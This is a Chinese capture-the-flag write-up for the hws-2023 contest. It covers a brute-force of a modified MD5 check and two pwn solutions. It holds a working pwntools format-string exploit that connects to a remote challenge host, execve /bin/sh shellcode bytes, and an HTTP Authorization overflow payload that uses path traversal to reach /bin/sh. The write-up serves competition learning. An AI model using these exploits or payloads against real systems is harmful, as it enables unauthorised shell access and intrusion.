hws-2023

没有时间参加线下的夏令营，所以没花太多时间，只是简单做了几道题

re

Animals

输入9个数字，有6个选项，选中的选项就把对应的字符串拼接到后面，然后算一个魔改的md5，最主要的改动就是替换了这4个值

void md5_starts(md5_context *ctx) {
  ctx->total[0] = 0;
  ctx->total[1] = 0;

  ctx->state[0] = 0xEFCDAB89;
  ctx->state[1] = 0x67452301;
  ctx->state[2] = 0x10325476;
  ctx->state[3] = 0x98BADCFE;
}

总共也就只有6^9种可能，直接爆破得到输入051410233，算md5即可

#include <stdio.h>
#include <string.h>
#include <strings.h>
unsigned char res[18] = {
    0xDD, 0xB2, 0x6D, 0xF3, 0xE6, 0x0A, 0xC7, 0x83,
    0x4A, 0x93, 0x50, 0xB4, 0xA4, 0x59, 0xAB, 0x0E,
};

typedef struct {
  unsigned long total[2];   /*!< number of bytes processed  */
  unsigned long state[4];   /*!< intermediate digest state  */
  unsigned char buffer[64]; /*!< data block being processed */
} md5_context;

#ifdef __cplusplus
extern "C" {
#endif

/**
 * \brief          MD5 context setup
 *
 * \param ctx      context to be initialized
 */
void md5_starts(md5_context *ctx);

/**
 * \brief          MD5 process buffer
 *
 * \param ctx      MD5 context
 * \param input    buffer holding the  data
 * \param ilen     length of the input data
 */
void md5_update(md5_context *ctx, const unsigned char *input, int ilen);

/**
 * \brief          MD5 final digest
 *
 * \param ctx      MD5 context
 * \param output   MD5 checksum result
 */
void md5_finish(md5_context *ctx, unsigned char output[16]);

/**
 * \brief          Output = MD5( input buffer )
 *
 * \param input    buffer holding the  data
 * \param ilen     length of the input data
 * \param output   MD5 checksum result
 */
void md5(unsigned char *input, int ilen, unsigned char output[16]);

#ifdef __cplusplus
}
#endif

/*
 * 32-bit integer manipulation macros (little endian)
 */
#ifndef GET_ULONG_LE
#define GET_ULONG_LE(n, b, i)                                                  \
  {                                                                            \
    (n) = ((unsigned long)(b)[(i)]) | ((unsigned long)(b)[(i) + 1] << 8) |     \
          ((unsigned long)(b)[(i) + 2] << 16) |                                \
          ((unsigned long)(b)[(i) + 3] << 24);                                 \
  }
#endif

#ifndef PUT_ULONG_LE
#define PUT_ULONG_LE(n, b, i)                                                  \
  {                                                                            \
    (b)[(i)] = (unsigned char)((n));                                           \
    (b)[(i) + 1] = (unsigned char)((n) >> 8);                                  \
    (b)[(i) + 2] = (unsigned char)((n) >> 16);                                 \
    (b)[(i) + 3] = (unsigned char)((n) >> 24);                                 \
  }
#endif

/*
 * MD5 context setup
 */
void md5_starts(md5_context *ctx) {
  ctx->total[0] = 0;
  ctx->total[1] = 0;

  ctx->state[0] = 0xEFCDAB89;
  ctx->state[1] = 0x67452301;
  ctx->state[2] = 0x10325476;
  ctx->state[3] = 0x98BADCFE;
}

static void md5_process(md5_context *ctx, const unsigned char data[64]) {
  unsigned long X[16], A, B, C, D;

  GET_ULONG_LE(X[0], data, 0);
  GET_ULONG_LE(X[1], data, 4);
  GET_ULONG_LE(X[2], data, 8);
  GET_ULONG_LE(X[3], data, 12);
  GET_ULONG_LE(X[4], data, 16);
  GET_ULONG_LE(X[5], data, 20);
  GET_ULONG_LE(X[6], data, 24);
  GET_ULONG_LE(X[7], data, 28);
  GET_ULONG_LE(X[8], data, 32);
  GET_ULONG_LE(X[9], data, 36);
  GET_ULONG_LE(X[10], data, 40);
  GET_ULONG_LE(X[11], data, 44);
  GET_ULONG_LE(X[12], data, 48);
  GET_ULONG_LE(X[13], data, 52);
  GET_ULONG_LE(X[14], data, 56);
  GET_ULONG_LE(X[15], data, 60);

#define S(x, n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n)))

#define P(a, b, c, d, k, s, t)                                                 \
  {                                                                            \
    a += F(b, c, d) + X[k] + t;                                                \
    a = S(a, s) + b;                                                           \
  }

  A = ctx->state[0];
  B = ctx->state[1];
  C = ctx->state[2];
  D = ctx->state[3];

#define F(x, y, z) (~(~z | x) | (x & y))

  P(A, B, C, D, 0, 7, 0xD76AA478);
  P(D, A, B, C, 1, 12, 0xE8C7B756);
  P(C, D, A, B, 2, 17, 0x242070DB);
  P(B, C, D, A, 3, 22, 0xC1BDCEEE);
  P(A, B, C, D, 4, 7, 0xF57C0FAF);
  P(D, A, B, C, 5, 12, 0x4787C62A);
  P(C, D, A, B, 6, 17, 0xA8304613);
  P(B, C, D, A, 7, 22, 0xFD469501);
  P(A, B, C, D, 8, 7, 0x698098D8);
  P(D, A, B, C, 9, 12, 0x8B44F7AF);
  P(C, D, A, B, 10, 17, 0xFFFF5BB1);
  P(B, C, D, A, 11, 22, 0x895CD7BE);
  P(A, B, C, D, 12, 7, 0x6B901122);
  P(D, A, B, C, 13, 12, 0xFD987193);
  P(C, D, A, B, 14, 17, 0xA679438E);
  P(B, C, D, A, 15, 22, 0x49B40821);

#undef F

#define F(x, y, z) (~(z | ~y) | (z & x))

  P(A, B, C, D, 1, 5, 0xF61E2562);
  P(D, A, B, C, 6, 9, 0xC040B340);
  P(C, D, A, B, 11, 14, 0x265E5A51);
  P(B, C, D, A, 0, 20, 0xE9B6C7AA);
  P(A, B, C, D, 5, 5, 0xD62F105D);
  P(D, A, B, C, 10, 9, 0x02441453);
  P(C, D, A, B, 15, 14, 0xD8A1E681);
  P(B, C, D, A, 4, 20, 0xE7D3FBC8);
  P(A, B, C, D, 9, 5, 0x21E1CDE6);
  P(D, A, B, C, 14, 9, 0xC33707D6);
  P(C, D, A, B, 3, 14, 0xF4D50D87);
  P(B, C, D, A, 8, 20, 0x455A14ED);
  P(A, B, C, D, 13, 5, 0xA9E3E905);
  P(D, A, B, C, 2, 9, 0xFCEFA3F8);
  P(C, D, A, B, 7, 14, 0x676F02D9);
  P(B, C, D, A, 12, 20, 0x8D2A4C8A);

#undef F

#define F(x, y, z) (x ^ y ^ z)

  P(A, B, C, D, 5, 4, 0xFFFA3942);
  P(D, A, B, C, 8, 11, 0x8771F681);
  P(C, D, A, B, 11, 16, 0x6D9D6122);
  P(B, C, D, A, 14, 23, 0xFDE5380C);
  P(A, B, C, D, 1, 4, 0xA4BEEA44);
  P(D, A, B, C, 4, 11, 0x4BDECFA9);
  P(C, D, A, B, 7, 16, 0xF6BB4B60);
  P(B, C, D, A, 10, 23, 0xBEBFBC70);
  P(A, B, C, D, 13, 4, 0x289B7EC6);
  P(D, A, B, C, 0, 11, 0xEAA127FA);
  P(C, D, A, B, 3, 16, 0xD4EF3085);
  P(B, C, D, A, 6, 23, 0x04881D05);
  P(A, B, C, D, 9, 4, 0xD9D4D039);
  P(D, A, B, C, 12, 11, 0xE6DB99E5);
  P(C, D, A, B, 15, 16, 0x1FA27CF8);
  P(B, C, D, A, 2, 23, 0xC4AC5665);

#undef F

#define F(x, y, z) (y ^ (x | ~z))

  P(A, B, C, D, 0, 6, 0xF4292244);
  P(D, A, B, C, 7, 10, 0x432AFF97);
  P(C, D, A, B, 14, 15, 0xAB9423A7);
  P(B, C, D, A, 5, 21, 0xFC93A039);
  P(A, B, C, D, 12, 6, 0x655B59C3);
  P(D, A, B, C, 3, 10, 0x8F0CCC92);
  P(C, D, A, B, 10, 15, 0xFFEFF47D);
  P(B, C, D, A, 1, 21, 0x85845DD1);
  P(A, B, C, D, 8, 6, 0x6FA87E4F);
  P(D, A, B, C, 15, 10, 0xFE2CE6E0);
  P(C, D, A, B, 6, 15, 0xA3014314);
  P(B, C, D, A, 13, 21, 0x4E0811A1);
  P(A, B, C, D, 4, 6, 0xF7537E82);
  P(D, A, B, C, 11, 10, 0xBD3AF235);
  P(C, D, A, B, 2, 15, 0x2AD7D2BB);
  P(B, C, D, A, 9, 21, 0xEB86D391);

#undef F

  ctx->state[0] += A;
  ctx->state[1] += B;
  ctx->state[2] += C;
  ctx->state[3] += D;
}

/*
 * MD5 process buffer
 */
void md5_update(md5_context *ctx, const unsigned char *input, int ilen) {
  int fill;
  unsigned long left;

  if (ilen <= 0)
    return;

  left = ctx->total[0] & 0x3F;
  fill = 64 - left;

  ctx->total[0] += ilen;
  ctx->total[0] &= 0xFFFFFFFF;

  if (ctx->total[0] < (unsigned long)ilen)
    ctx->total[1]++;

  if (left && ilen >= fill) {
    memcpy((void *)(ctx->buffer + left), input, fill);
    md5_process(ctx, ctx->buffer);
    input += fill;
    ilen -= fill;
    left = 0;
  }

  while (ilen >= 64) {
    md5_process(ctx, input);
    input += 64;
    ilen -= 64;
  }

  if (ilen > 0) {
    memcpy((void *)(ctx->buffer + left), input, ilen);
  }
}

static const unsigned char md5_padding[64] = {
    0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0,    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0};

/*
 * MD5 final digest
 */
void md5_finish(md5_context *ctx, unsigned char output[16]) {
  unsigned long last, padn;
  unsigned long high, low;
  unsigned char msglen[8];

  high = (ctx->total[0] >> 29) | (ctx->total[1] << 3);
  low = (ctx->total[0] << 3);

  PUT_ULONG_LE(low, msglen, 0);
  PUT_ULONG_LE(high, msglen, 4);

  last = ctx->total[0] & 0x3F;
  padn = (last < 56) ? (56 - last) : (120 - last);

  md5_update(ctx, md5_padding, padn);
  md5_update(ctx, msglen, 8);

  PUT_ULONG_LE(ctx->state[0], output, 0);
  PUT_ULONG_LE(ctx->state[1], output, 4);
  PUT_ULONG_LE(ctx->state[2], output, 8);
  PUT_ULONG_LE(ctx->state[3], output, 12);
}

/*
 * output = MD5( input buffer )
 */
void md5(unsigned char *input, int ilen, unsigned char output[16]) {
  md5_context ctx;
  memset(&ctx, 0, sizeof(md5_context));
  md5_starts(&ctx);
  md5_update(&ctx, input, ilen);
  md5_finish(&ctx, output);
}

char charset[6][7] = {"cat", "dog", "fox", "panda", "dragon", "monkey"};
int main() {
  // for (int i = 0; i < 16; i++) {
  //   res[i] ^= 0x16;
  //   printf("%02x", res[i]);
  // }
  // printf("\n");
  for (int a = 0; a < 6; a++) {
    for (int b = 0; b < 6; b++) {
      for (int c = 0; c < 6; c++) {
        for (int d = 0; d < 6; d++) {
          for (int e = 0; e < 6; e++) {
            for (int f = 0; f < 6; f++) {
              for (int g = 0; g < 6; g++) {
                for (int h = 0; h < 6; h++) {
                  for (int i = 0; i < 6; i++) {
                    char buf[1000];
                    memset(buf, 0, 1000);
                    strcpy(buf, charset[a]);
                    strcat(buf, charset[b]);
                    strcat(buf, charset[c]);
                    strcat(buf, charset[d]);
                    strcat(buf, charset[e]);
                    strcat(buf, charset[f]);
                    strcat(buf, charset[g]);
                    strcat(buf, charset[h]);
                    strcat(buf, charset[i]);
                    printf("Try: %s\n", buf);
                    unsigned char output[200];
                    md5(buf, strlen(buf), output);
                    if (!memcmp(output, res, 16)) {
                      printf("======= Found: %s\n", buf);
                      printf("%d%d%d%d%d%d%d%d%d\n", a, b, c, d, e, f, g, h, i);
                      return 0;
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

pwn

fmt

两次格式化字符串，一次泄露栈地址和libc地址，一次写，给了libc，可以向返回地址里写one_gadget

#!/usr/bin/env python3

# %%
from pwn import *
from LibcSearcher import *

exe = ELF("./fmt_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-2.31.so")

context.binary = exe
context.os = "linux"
context.arch = context.binary.arch
context.terminal = ["konsole", "-e"]
# context.terminal = ['wt.exe', 'wsl', '--']

local = False
if local:
    context.log_level = "debug"
    p = process([exe.path])
else:
    p = remote("123.60.179.52",30110)


def dbgaddr(addr, PIE=False):  # PIE enabled
    if local:
        if PIE:
            text_base = int(
                os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[2], 16
            )
            log.info(f"b *{hex(text_base + addr)}\n")
            gdb.attach(p, f"b *{hex(text_base + addr)}")
        else:
            gdb.attach(p, f"b *{hex(addr)}")


def dbg(func=""):
    if local:
        gdb.attach(p, func)


def main_arena():
    # from ptrlib
    ofs_stdin = libc.sym._IO_2_1_stdin_
    ofs_realloc_hook = libc.sym.__realloc_hook
    ofs_malloc_hook = libc.sym.__malloc_hook
    if ofs_realloc_hook is None or ofs_malloc_hook is None or ofs_stdin is None:
        return None

    if 0 < ofs_malloc_hook - ofs_stdin < 0x1000:
        # libc-2.33 or older
        if context.bits == 32:
            return ofs_malloc_hook + 0x18
        else:
            return ofs_malloc_hook + (ofs_malloc_hook - ofs_realloc_hook) * 2

    else:
        # libc-2.34 removed hooks
        ofs_tzname = libc.sym.tzname
        if ofs_tzname is None:
            return None
        if context.bits == 32:
            return ofs_tzname - 0x460
        else:
            return ofs_tzname - 0x8A0


def ROL(content, key):
    # house of emma
    # ROL(gadget_addr ^ fake_pointer_guard, 0x11)
    tmp = bin(content)[2:].rjust(64, "0")
    return int(tmp[key:] + tmp[:key], 2)


dbgaddr(0x1340, PIE=True)
# dbg("run")

s = lambda str: p.send(str)
sl = lambda str: p.sendline(str)
sa = lambda delims, str: p.sendafter(delims, str)
sla = lambda delims, str: p.sendlineafter(delims, str)
r = lambda numb=4096: p.recv(numb)
rl = lambda: p.recvline()
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
uu32 = lambda data: u32(data.ljust(4, b"\x00"))
uu64 = lambda data: u64(data.ljust(8, b"\x00"))
li = lambda str, data: log.success(str + "========>" + hex(data))

# https://www.exploit-db.com/shellcodes
execve_bin_sh = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
execveat_bin_sh = b"\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05"
cat_flag = b"\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x67\x6d\x60\x66\x01\x01\x01\x48\x31\x04\x24\x6a\x02\x58\x48\x89\xe7\x31\xf6\x99\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05"
ls_current_dir = b"\x68\x2f\x2e\x01\x01\x81\x34\x24\x01\x01\x01\x01\x48\x89\xe7\x31\xd2\xbe\x01\x01\x02\x01\x81\xf6\x01\x01\x03\x01\x6a\x02\x58\x0f\x05\x48\x89\xc7\x31\xd2\xb6\x03\x48\x89\xe6\x6a\x4e\x58\x0f\x05\x6a\x01\x5f\x31\xd2\xb6\x03\x48\x89\xe6\x6a\x01\x58\x0f\x05"

# %%
sla("str: ", "%14$p|%8$p")
# print(rl())
stack = ru("|")[2:]
# print(stack)
target = int(stack, 16) + 8
libc = int(rl()[2:-1], 16) - 0x1e94a0
li("ret addr", target)
li("libc", libc)
one=libc+0xe3b01
li("gadget",one)
payload=fmtstr_payload(6,{target:one},0,'short')

print(len(payload))
sla("str: ", payload)

# %%

p.interactive()

ezhttpd

tinyhttpd魔改的一个httpd服务，只接受GET和POST，但是需要身份验证，解base64时存在溢出，可以覆写url，绕过之前对..的检测，密码是随机数无法绕过，但是当url里面存在.css、.html等字符串时可以直接验证通过，漏洞利用的位置在cgi执行，判断url存在且可执行，就会执行对应的文件，?会进行截断，将.css放在?后面，可以通过验证，也不影响对于文件存在性的判断。

sl("GET /a.css")
sl(
    b"Authorization: Basic "
    + base64.b64encode(
        b"admin:"
        + b"a" * (0x40 - 6)
        + b"/../../../../../../../../../../../../../../../../bin/sh?.css"
    )
)
sl("")